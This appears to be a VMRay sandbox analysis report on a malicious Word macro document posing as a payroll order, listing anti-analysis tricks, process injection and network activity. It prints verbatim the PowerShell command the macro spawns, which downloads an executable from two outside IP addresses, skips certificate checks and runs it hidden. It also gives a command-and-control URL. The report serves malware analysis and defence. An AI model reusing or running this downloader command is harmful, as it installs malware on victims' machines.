a14e514d...0b34 | VTI
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Dropper, Downloader

a14e514ddfc3a921c5a9e2fc9b931bc734b4927fa9d4b011ab77f9e46da50b34 (SHA256)

Order_Payroll_81154032.doc

Word Document

Created at 2019-02-06 16:40:00

...

Notifications (1/1)

The overall sleep time of all monitored processes was truncated from "20 seconds" to "10 seconds" to reveal dormant functionality.

Severity Category Operation Classification
5/5
Anti Analysis Tries to detect virtual machine -
  • Possibly trying to detect VM via rdtsc.
    ...
    • VTI Actions
5/5
Anti Analysis Makes direct system call to possibly evade hooking based sandboxes -
  • Makes a direct system call to "NtUnmapViewOfSection".
    ...
    • VTI Actions
  • Makes a direct system call to "NtCreateSection".
    ...
    • VTI Actions
  • Makes a direct system call to "NtMapViewOfSection".
    ...
    • VTI Actions
  • Makes a direct system call to "NtWriteVirtualMemory".
    ...
    • VTI Actions
  • Makes a direct system call to "NtResumeThread".
    ...
    • VTI Actions
5/5
Injection Writes into the memory of another running process -
  • "c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe" modifies memory of "c:\windows\system32\svchost.exe"
    ...
5/5
Injection Writes into the memory of a process running from a created or modified executable -
  • "c:\users\aetadzjz\appdata\local\temp\fulezad.exe" modifies memory of "c:\users\aetadzjz\appdata\local\temp\fulezad.exe"
    ...
  • "c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe" modifies memory of "c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe"
    ...
5/5
Injection Modifies control flow of a process running from a created or modified executable -
  • "c:\users\aetadzjz\appdata\local\temp\fulezad.exe" alters context of "c:\users\aetadzjz\appdata\local\temp\fulezad.exe"
    ...
  • "c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe" alters context of "c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe"
    ...
4/5
Process Creates process -
  • Creates process "powershell.exe "<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; (new-object system.net.webclient <#replace ext#> ).downloadfile($string1,($env:temp+'\fulezad.exe'));}catch{$beos1=0;}return $beos1;}$mmb1=@('64.44.51.87/electra.crm','89.46.223.114/electra.crm');foreach ($bifa in $mmb1){if(split-strings('https://'+$bifa) -eq 1){break;} };<#validate component#>start-process ($env:temp+'\fulezad.exe') -windowstyle hidden;"".
    ...
  • Creates process "C:\Users\aETAdzjz\AppData\Local\Temp\fulezad.exe".
    ...
  • Creates process "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe".
    ...
  • Creates process "C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe".
    ...
4/5
Process Reads from memory of another process -
  • "c:\users\aetadzjz\appdata\local\temp\fulezad.exe" reads from "C:\Users\aETAdzjz\AppData\Local\Temp\fulezad.exe".
    ...
  • "c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe" reads from "C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe".
    ...
  • "c:\users\aetadzjz\appdata\roaming\cleanmem\fumezad.exe" reads from "C:\Windows\system32\svchost.exe".
    ...
4/5
OS Disables a crucial system service -
4/5
Network Downloads data Downloader
  • URL "HTTPS://185.222.202.79/sat36/YKYD69Q_W617601.2E664EE04488A02C628E0E6CA864C24A/5/spk/".
    ...
3/5
Network Connects to remote host -
3/5
PE Executes dropped PE file -
3/5
YARA YARA match -
  • Rule "VBA_Execution_Commands" from ruleset "Generic" has matched for "C:\Users\aETAdzjz\Desktop\Order_Payroll_81154032.doc"
    ...
  • Rule "VBA_Time_Delay_with_HighVal" from ruleset "Generic" has matched for "C:\Users\aETAdzjz\Desktop\Order_Payroll_81154032.doc"
    ...
2/5
Network Connects to HTTP server -
  • URL "185.222.202.79/sat36/YKYD69Q_W617601.2E664EE04488A02C628E0E6CA864C24A/5/spk/".
    ...
2/5
PE Drops PE file Dropper
2/5
VBA Macro Executes macro on specific worksheet event -
  • Executes macro automatically on target "auto" and event "open".
    ...
2/5
VBA Macro Creates suspicious COM object -
1/5
Process Creates system object -
1/5
Static Unparsable sections in file -
  • Static analyzer was unable to completely parse the analyzed file: C:\Users\aETAdzjz\AppData\Local\Temp\fulezad.exe.
    ...
1/5
VBA Macro Contains Office macro -
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image